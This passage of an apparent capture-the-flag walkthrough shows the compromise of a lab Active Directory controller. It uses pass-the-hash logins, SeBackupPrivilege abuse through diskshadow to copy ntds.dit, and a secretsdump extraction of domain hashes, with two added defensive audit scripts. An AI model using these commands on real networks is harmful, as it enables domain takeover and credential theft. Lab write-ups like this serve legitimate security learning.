        wdigest :
         * Username : svc_backup
         * Domain   : BLACKFIELD
         * Password : (null)
        kerberos :
         * Username : svc_backup
         * Domain   : BLACKFIELD.LOCAL
         * Password : (null)
        ssp :
        credman :


Authentication Id : 0 ; 153705 (00000000:00025869)
Session           : Interactive from 1
User Name         : Administrator
Domain            : BLACKFIELD
Logon Server      : DC01
Logon Time        : 23-02-2020 23:29:04
SID               : S-1-5-21-4194615774-2175524697-3563712290-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : BLACKFIELD
         * NTLM     : 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
         * SHA1     : db5c89a961644f0978b4b69a4d2a2239d7886368
         * DPAPI    : 240339f898b6ac4ce3f34702e4a89550
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : BLACKFIELD
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : BLACKFIELD.LOCAL
         * Password : (null)
        ssp :
        credman :

There is an administrator NTLM hash, but I don't think it will be that easy.

➜  prashant evil-winrm -i 10.10.10.192 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

➜  prashant

As expected, it didn't work. Move on.

Login as svc_backup

┌─[puck@parrot-lt]─[~/htb/blackfield]
└──╼ $docker run byt3bl33d3r/crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
┌─[puck@parrot-lt]─[~/htb/blackfield]

Then I tried the second NTLM hash, the one for svc_backup, and it works for WinRM:

  prashant evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d   

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup

Got user.txt

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
8ac------------------------------bd
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>

Privilege escalation to root

Root is simpler than I expected.

whoami /all

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

From the output, these are the interesting entries, and they fit the username svc_backup:

BUILTIN\Backup Operators

SeBackupPrivilege             Back up files and directories  Enabled
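Spotting those two lines by eye works for one account; for a service-account review it is worth automating. The following is an added example, not code from the writeup; it parses `whoami /all` output into the user, group and privilege sections and flags the groups and privileges that let a holder bypass file ACLs or take over the host. The sample text is a copy of the output above.

```python
"""Added example, not from the original writeup: an audit of `whoami /all`
output like the one above. It parses the three sections and flags group
memberships and privileges that matter on a domain controller, which is how a
reviewer of a service account would spot that svc_backup can read any file on
the DC. The sample text is a copy of the output shown above."""
import re

PRIVILEGED_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}
# Privileges that let a holder bypass file ACLs or take over the host.
SENSITIVE_PRIVILEGES = {
    "SeBackupPrivilege", "SeRestorePrivilege", "SeDebugPrivilege",
    "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege", "SeTcbPrivilege",
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeCreateTokenPrivilege", "SeManageVolumePrivilege",
}
USER_RE = re.compile(r"^(?P<name>\S+)\s+(?P<sid>S-1-[\d-]+)\s*$")
GROUP_RE = re.compile(r"^(?P<name>.+?)\s+(?P<type>Well-known group|Alias|Group|Label|User)\s+(?P<sid>S-1-[\d-]+)")
PRIV_RE = re.compile(r"^(?P<name>Se\w+Privilege)\s+(?P<desc>.+?)\s+(?P<state>Enabled|Disabled)\s*$")

WHOAMI_SAMPLE = r"""
USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.
"""


def audit_whoami(text: str) -> dict:
    """Parse `whoami /all` text and flag privileged groups and sensitive privileges."""
    section, user, groups, privs = None, None, [], []
    for line in text.splitlines():
        line = line.rstrip()
        if line.endswith(" INFORMATION"):
            section = line[: -len(" INFORMATION")]   # USER / GROUP / PRIVILEGES / USER CLAIMS
            continue
        if section == "USER" and (m := USER_RE.match(line)):
            user = m["name"]
        elif section == "GROUP" and (m := GROUP_RE.match(line)):
            groups.append((m["name"], m["sid"]))
        elif section == "PRIVILEGES" and (m := PRIV_RE.match(line)):
            privs.append((m["name"], m["state"]))
    return {
        "user": user,
        "groups": groups,
        "privileges": privs,
        "flagged_groups": [n for n, sid in groups if sid in PRIVILEGED_GROUP_SIDS],
        # State is ignored on purpose: a disabled privilege can be enabled by its holder.
        "flagged_privileges": [n for n, _ in privs if n in SENSITIVE_PRIVILEGES],
    }


if __name__ == "__main__":
    result = audit_whoami(WHOAMI_SAMPLE)
    print(result["user"], "->", result["flagged_groups"], result["flagged_privileges"])
```

Group membership is matched on SID rather than name so that localized or renamed groups still trip the check; Backup Operators (S-1-5-32-551) is the one that explains both SeBackupPrivilege and SeRestorePrivilege here.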

The user svc_backup can back up data since it has SeBackupPrivilege.

It took me some time to work out what to do with it, but a few Google searches saved the day.

Since this is an AD machine and I have permission to back up anything on it, I am going to back up the NTDS.dit file and the SYSTEM registry hive.

The Ntds.dit file is the database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.

Here is a good explanation, from a slide deck, of how this is going to work:

https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf

I need to use diskshadow first to make a shadow copy of the C: volume and expose it under an alias, so I can read everything from C: (the live ntds.dit cannot be copied directly).

Here I made a text file, basically a script of commands for the diskshadow console:

SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias 0xprashant
create
expose %0xprashant% z:

Uploading the script

*Evil-WinRM* PS C:\temp> upload /home/prashant/0xprashant.txt
Info: Uploading /home/prashant/0xprashant.txt to C:\temp\0xprashant.txt

                                                             
Data: 124 bytes of 124 bytes copied

Info: Upload successful!

Executing the script

*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/10/2020 3:34:37 PM

-> SET CONTEXT PERSISTENT NOWRITER

SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }

        CLIENTACCESSIBLE        Specify to create shadow copies usable by client versions of Windows.
        PERSISTENT              Specify that shadow copy is persist across program exit, reset or reboot.
        PERSISTENT NOWRITERS    Specify that shadow copy is persistent and all writers are excluded.
        VOLATILE                Specify that shadow copy will be deleted on exit or reset.
        VOLATILE NOWRITERS      Specify that shadow copy is volatile and all writers are excluded.

        Example: SET CONTEXT CLIENTACCESSIBLE

I got an error like this. Looking at it, diskshadow complains about -> SET CONTEXT PERSISTENT NOWRITER, but in my script it is NOWRITERS, not NOWRITER.

Then I figured out that the last character of each line was being dropped before the line was used.

So I added an extra dummy character at the end of every line:

➜  prashant cat 0xprashant.txt 
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias 0xprashantp
createp
expose %0xprashant% z:p

Like this.

Running it again:

*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/10/2020 3:41:15 PM

-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias 0xprashant
-> create
Alias 0xprashant for shadow ID {84b7f11c-93da-4701-9af4-2c0adfc7cb2e} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9} set as environment variable.

Querying all shadow copies with the shadow copy set ID {c38f96e5-6d7e-49f8-b605-25b0b25934e9}

        * Shadow copy ID = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e}               %0xprashant%
                - Shadow copy set: {c38f96e5-6d7e-49f8-b605-25b0b25934e9}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 6/10/2020 3:41:17 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %0xprashant% z:
-> %0xprashant% = {84b7f11c-93da-4701-9af4-2c0adfc7cb2e}
The shadow copy was successfully exposed as z:\.

This time it ran smoothly and the shadow copy is exposed as z:.

Now it's time to copy the NTDS.dit file. There is a tool on GitHub that does this for me:

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

Upload the two DLL files to the machine and then simply import them:

*Evil-WinRM* PS C:\temp> upload /home/prashant/SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/prashant/SeBackupPrivilegeCmdLets.dll to C:\temp\SeBackupPrivilegeCmdLets.dll

                                                             
Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\temp> upload /home/prashant/SeBackupPrivilegeUtils.dll
Info: Uploading /home/prashant/SeBackupPrivilegeUtils.dll to C:\temp\SeBackupPrivilegeUtils.dll

                                                             
Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

Importing the modules:

*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp> import-module .\SeBackupPrivilegeCmdLets.dll

Copying the NTDS.dit

*Evil-WinRM* PS C:\temp> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/10/2020   3:37 PM             98 0xprashant.txt
-a----        6/10/2020   3:39 PM            636 2020-06-10_15-39-54_DC01.cab
-a----        6/10/2020   3:41 PM            627 2020-06-10_15-41-18_DC01.cab
-a----        6/10/2020   3:51 PM       18874368 ndts.dit
-a----        6/10/2020   3:46 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        6/10/2020   3:48 PM          16384 SeBackupPrivilegeUtils.dll

And we got it. Now it's time for the SYSTEM hive:

*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system
The operation completed successfully.

And download both files:

*Evil-WinRM* PS C:\temp> download system
*Evil-WinRM* PS C:\temp> download ntds.dit

Dumping NTLM from ntds.dit and system

Now that I have both files, I can use secretsdump.py to dump the NTLM hashes from them:

➜  blackfield python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
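The same domain\uid:rid:lmhash:nthash::: lines are what a defender gets from an authorised NTDS extraction, and in that setting they are read for password hygiene rather than for cracking. The following is an added example, not code from the writeup or from impacket; it parses secretsdump.py output (skipping the status lines) and reports empty passwords, stored LM hashes and accounts sharing a password. The Administrator line is the one from the writeup; the other lines and their hashes are constructed dummies.

```python
"""Added example, not from the original writeup: a reader for the
domain\\uid:rid:lmhash:nthash::: lines that secretsdump.py prints, used the
way a defender uses an NTDS extraction, i.e. as a password-hygiene audit.
The Administrator line is the one from the writeup; the other lines are
constructed and their hashes are dummies."""
from __future__ import annotations

from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when no LM password is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

SAMPLE_OUTPUT = """\
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BLACKFIELD\\svc_demo1:1500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
BLACKFIELD\\svc_demo2:1501:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
BLACKFIELD\\legacy01:1502:ffeeddccbbaa99887766554433221100:0123456789abcdef0123456789abcdef:::
[*] Cleaning up...
"""


def parse_secretsdump(text: str) -> list[dict]:
    """Parse pwdump-style account lines; skip impacket's [*]/[-] status lines
    and the Kerberos key lines (user:aes256-cts-hmac-sha1-96:...) that follow."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        records.append({
            "account": parts[0],
            "rid": int(parts[1]),
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return records


def hygiene_findings(records: list[dict]) -> dict:
    """Three checks a reviewer runs first over a hash dump."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["account"])
    return {
        # Accounts whose password is literally empty.
        "empty_password": [r["account"] for r in records if r["nt"] == EMPTY_NT],
        # LM hashes should be absent on a modern domain; a real one means LM storage is on.
        "lm_hash_stored": [r["account"] for r in records if r["lm"] != EMPTY_LM],
        # Identical NT hashes mean identical passwords, i.e. password reuse across accounts.
        "shared_password": [accts for nt, accts in by_nt.items()
                            if nt != EMPTY_NT and len(accts) > 1],
    }


if __name__ == "__main__":
    recs = parse_secretsdump(SAMPLE_OUTPUT)
    print(f"{len(recs)} accounts parsed")
    for name, hit in hygiene_findings(recs).items():
        print(name, "->", hit)
```

The shared-password check is the one that pays off most in practice: it needs no cracking at all, since two accounts with the same NT hash have the same password whatever it is.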

And here we have the NTLM hash for the administrator user.

Login as administrator

  blackfield evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee 

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator

Got root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
6d1--------------------------f67
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

And we pwned it.


Resources

rpcclient enumeration: https://ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging
Reset a password with rpcclient: https://malicious.link/post/2017/reset-ad-user-password-with-linux/
Dumping lsass.dmp: https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
mimikatz: https://github.com/gentilkiwi/mimikatz/releases
Attacking SeBackupPrivilege: https://hackinparis.com/data/slides/2019/talks/HIP2019-Andrea_Pierini-Whoami_Priv_Show_Me_Your_Privileges_And_I_Will_Lead_You_To_System.pdf
Copy ntds.dit tool (SeBackupPrivilege cmdlets): https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug